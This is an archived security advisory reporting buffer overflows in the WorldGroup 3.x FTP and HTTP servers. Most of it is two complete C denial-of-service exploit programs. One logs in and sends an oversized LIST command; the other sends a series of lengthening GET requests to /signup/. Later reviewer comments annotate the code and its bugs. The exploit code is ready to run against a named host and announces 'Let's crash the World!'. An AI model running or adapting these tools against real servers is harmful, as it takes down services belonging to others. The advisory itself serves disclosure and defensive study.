
WorldGroup ftp & http buffer overflows



28th Feb 2002 [SBWID-5152]
COMMAND

	WorldGroup ftp & http buffer overflows

SYSTEMS AFFECTED

	WorldGroup  3.x

PROBLEM

	Limpid Byte team [http://lbyte.void.ru, lbyte@host.sk] reports :
	

	The FTP server overflows on a long LIST command.
	

	The HTTP server overflows on a long request:
	

	GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0

	

	

	 Proof of concept code :

	 =====================

	

	DoS exploits by Limpid Byte team, also available from :
	

	http://www.security.nnov.ru/files/worldgroupdos.zip

	

	

	----------------- BEGIN FTP_DOS.C ---------------------

	/*

	        by Limpid Byte project

	        http://lbyte.void.ru

	        lbyte@host.sk

	

	[Worldgroup FTP Server Denial of Service]

	More than 105 "/" characters in the LIST command.

	

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <winsock.h>

	

	#define FOUND \"220\"

	

	/*
	 * Entry point of the FTP_DOS proof of concept: log in to the target's
	 * FTP service on port 21 and send one LIST command whose argument is a
	 * long run of glob ("*") and parent-directory ("..") path segments, the
	 * condition this advisory reports as crashing WorldGroup 3.x.
	 * Usage: ftp_dos.exe HOST LOGIN PASSWORD.  Returns 0 after the
	 * exchange; exit(1) on usage, WinSock, name-resolution or connect
	 * failure.  Windows-only (winsock.h).  The FOUND macro defined above
	 * is not referenced anywhere in this file.
	 */
	int main(int argc, char *argv[])

	{

	        int sock;                 // connected socket; never passed to closesocket() (see end)

	        struct sockaddr_in blah;  // target address, port 21

	        struct hostent *he;       // gethostbyname() result

	        char cgiBuff[1024];       // receive buffer, one server reply per recv()

	        char *cgiPage[6];         // command fragments sent in order: USER, login, PASS, password, PASV, LIST

	        WSADATA wsaData;

	        char cr[] = \"\\n\";        // line terminator sent after each command
	                                  // NOTE(review): bare LF, not the CRLF that RFC 959 specifies

	

	        // NOTE(review): argv[3] (the password) is read below, so this guard
	        // should be argc < 4; with exactly three arguments cgiPage[3] becomes
	        // NULL and the strlen(NULL) in the send() below is undefined behaviour.
	        if (argc < 3)

	        {

	printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.\");

	printf(\"\\n\\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\r  USAGE:\\n\\r\");

	printf(\"Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] \");

	printf(\"\\n\\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \\n\");

	                exit(1);

	        }

	        // Login sequence; argv[2]/argv[3] are sent verbatim with no length check.
	        cgiPage[0] = \"USER \";

	        cgiPage[1] = (argv[2]);

	        cgiPage[2] = \"PASS \";

	        cgiPage[3] = (argv[3]);

	        cgiPage[4] = \"PASV\";

	        // The malformed LIST argument: a long run of "*" and ".." path
	        // segments (the header comment says more than 105 "/" are needed).
	        // It already ends in "\n", so the extra cr sent after it below
	        // reaches the server as an empty command line.
	        cgiPage[5] = \"LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\\n\";

	

	        // Request WinSock 1.1.
	        if(WSAStartup(0x101,&wsaData))

	        {

	                printf(\"Unable to initialize WinSock lib.\\n\");

	                exit(1);

	        }

	printf(\"Let\'s crash the World!\\n\\r\");

	printf(\"Coded by the [eaSt]:\\n\\r\");

	printf(\"\\nConnecting %s on port 21...\\n\\n\", argv[1]);

	

	        // NOTE(review): the socket() result is not compared with INVALID_SOCKET.
	        sock = socket(AF_INET,SOCK_STREAM,0);

	        blah.sin_family=AF_INET;

	        // NOTE(review): this assignment is overwritten by whichever branch
	        // below runs, so it is redundant.
	        blah.sin_addr.s_addr=inet_addr(argv[1]);

	        blah.sin_port=htons(21);

	        // Resolve argv[1] as a host name first; fall back to a dotted-quad parse.
	        if ((he = gethostbyname(argv[1])) != NULL)

	        {

	                memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);

	        }

	        else

	        {

	                if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)

	                {

	                WSACleanup();

	                exit(1);

	                }

	        }

	

	        // Exit on connect failure; the socket itself is not closed here.
	        if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)

	        {

	                WSACleanup();

	                exit(1);

	        }

	        // Read the greeting.  sizeof(cgiBuff) - 1 leaves room for the NUL
	        // written at the received length.
	        // NOTE(review): recv() returns SOCKET_ERROR (-1) on failure, which
	        // would index cgiBuff[-1] -- an out-of-bounds write in the tool
	        // itself.  The return value should be checked before it is used as
	        // an index; the same applies to every recv() below.
	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        // Server text is printed through a literal format string, so a reply
	        // containing '%' cannot act as a format string here.
	        printf(\"<< %s\", cgiBuff);

	        // USER <login>\n -- none of the send() results are checked.
	        send(sock,cgiPage[0],strlen(cgiPage[0]),0);

	        send(sock,cgiPage[1],strlen(cgiPage[1]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;   // same negative-index caveat as above

	        printf(\">> %s %s\\n<< %s\", cgiPage[0], cgiPage[1], cgiBuff);

	        // PASS <password>\n
	        send(sock,cgiPage[2],strlen(cgiPage[2]),0);

	        send(sock,cgiPage[3],strlen(cgiPage[3]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;   // same negative-index caveat as above

	        printf(\">> %s %s\\n<< %s\", cgiPage[2], cgiPage[3], cgiBuff);

	        // PASV\n -- the data-connection address in the reply is only printed, never used.
	        send(sock,cgiPage[4],strlen(cgiPage[4]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;   // same negative-index caveat as above

	        printf(\">> %s\\n<< %s\", cgiPage[4], cgiBuff);

	        // The oversized LIST line, followed by a second "\n" (see cgiPage[5]).
	        send(sock,cgiPage[5],strlen(cgiPage[5]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;   // same negative-index caveat as above

	        printf(\">> %s\\n<< %s\", cgiPage[5], cgiBuff);

	

	        // The tool does not verify the outcome; the operator re-checks the service by hand.
	        printf(\"Try reconnect to %s\\n\", argv[1]);

	        // NOTE(review): sock is never closed with closesocket(); it is left
	        // to WSACleanup() and process exit.
	        WSACleanup();

	        return 0;

	}

	-----------------  END FTP_DOS.C  ---------------------

	

	----------------- BEGIN WWW_DOS.C ---------------------

	/*

	        by Limpid Byte project

	        http://lbyte.void.ru

	        lbyte@host.sk

	

	Worldgroup Server Denial of Service for

	Windows 9x/ME only.

	Error in the interaction between a Windows system function and

	WorldGroup's web interface.

	REQUEST:

	GET /signup/a.[aaaaaaaa....aaaa]

	

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <winsock.h>

	

	#define FOUND \"200\"

	

	/*
	 * Entry point of the WWW_DOS proof of concept: send 94 HTTP/1.0 GET
	 * requests to the target's port 80, each on a fresh connection, with a
	 * path under /signup/ that grows by one byte per request (219 to 312
	 * 'a' characters), and classify each reply by its first 32 bytes.
	 * Usage: www_dos.exe HOST.  Returns 0 after the loop; exit(1) on
	 * usage, WinSock, name-resolution or connect failure.  Windows-only
	 * (winsock.h).  FOUND ("200") is the status code that counts as the
	 * server still answering.
	 */
	int main(int argc, char *argv[])

	{

	        int sock, count;          // per-request socket; count = request index (0..93)

	        struct sockaddr_in blah;  // target address, port 80

	        struct hostent *he;       // gethostbyname() result

	        char cgiBuff[1024];       // reused for both the request and the reply

	        WSADATA wsaData;

	

	        if (argc < 2)

	        {

	                printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\\n\");

	                printf(\"Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\n\");

	                printf(\" USAGE   : www_dos.exe [HOST] \\n\");

	                printf(\" example : www_dos.exe 127.0.0.1 \\n\");

	                exit(1);

	        }

	

	        // Request WinSock 1.1.
	        if(WSAStartup(0x101,&wsaData))  

	        {

	                printf(\"Unable to initialize WinSock lib.\\n\"); 

	                exit(1);   

	        }

	        printf(\"Let\'s crash the World!\\n\");

	        printf(\"Coded by the [eaSt]:\\n\");

	        printf(\"\\nScanning %s on port 80...\\n\\n\", argv[1]);

	

	        // One connection per request; the host name is resolved again on every iteration.
	        for (count = 0; count < 94; count++)

	        {

	                // NOTE(review): the socket() result is not compared with INVALID_SOCKET.
	                sock = socket(AF_INET,SOCK_STREAM,0);

	                blah.sin_family=AF_INET;

	                // NOTE(review): overwritten by whichever branch below runs; redundant.
	                blah.sin_addr.s_addr=inet_addr(argv[1]);

	                blah.sin_port=htons(80);

	                // Resolve argv[1] as a host name first; fall back to a dotted-quad parse.
	                if ((he = gethostbyname(argv[1])) != NULL)

	                {

	                        memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);

	                }

	                else

	                {

	                        if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)

	                    {

	                                WSACleanup();

	                                exit(1);

	                        }

	                }

	

	                // Exit on connect failure; the socket itself is not closed here.
	                if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)

	                {

	                        WSACleanup();

	                        exit(1);

	                }

	

	                // Build the request in place: "GET /signup/" (12 bytes), then
	                // 219 + count 'a' bytes, then a 28-byte suffix.  The longest
	                // request is 12 + 312 + 28 = 352 bytes, well inside cgiBuff.
	                // NOTE(review): the line endings are bare "\n\n", not CRLF.
	                memset(cgiBuff, 0, sizeof(cgiBuff));

	                sprintf(cgiBuff, \"GET /signup/\");

	                memset(cgiBuff + 12, \'a\', 219 + count);

	                sprintf(cgiBuff + 12 + 219 + count, \".txt?=../test.txt HTTP/1.0\\n\\n\");

	                // NOTE(review): strlen() returns size_t, so %d is the wrong
	                // conversion here; use %zu or cast to int.
	                printf(\"Sending: %d symbols request\\n\", strlen(cgiBuff));

	

	                // send() result is not checked.
	                send(sock,cgiBuff,strlen(cgiBuff),0);

	                memset(cgiBuff, 0, sizeof(cgiBuff));

	                // recv() == 0 means the peer closed the connection, which the
	                // tool reports as a crash.
	                // NOTE(review): SOCKET_ERROR (-1) is non-zero and falls into the
	                // else branch, where the still-zeroed buffer is reported as
	                // "Not Found"; compare against <= 0 to tell the two apart.
	                if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {

	                        printf(\"Crashed\\n\");

	                }

	                else {

	                        // Keep only the first 32 bytes (enough for the status
	                        // line).  This also guarantees NUL termination, since
	                        // recv() above was allowed to fill the whole buffer.
	                        cgiBuff[32] = 0;

	                        // A "200" anywhere in those bytes counts as the server still serving.
	                        if (strstr(cgiBuff,FOUND))

	                        {

	                                printf(\"Send (%s)\\n\", cgiBuff);

	                        }

	                        else

	                        {

	                                printf(\"Not Found (%s)\\n\", cgiBuff);

	                        }

	                }

	

	                closesocket(sock);   // each iteration owns its own socket

	        }

	

	        // The tool does not verify the final outcome; the operator re-checks by hand.
	        printf(\"Try reconnect to %s\\n\", argv[1]);

	        WSACleanup();

	        return 0;

	}

	-----------------  END WWW_DOS.C  ---------------------

	

	

SOLUTION

	No patch is available yet. Check:
	

	http://www.gcomm.com

	

	

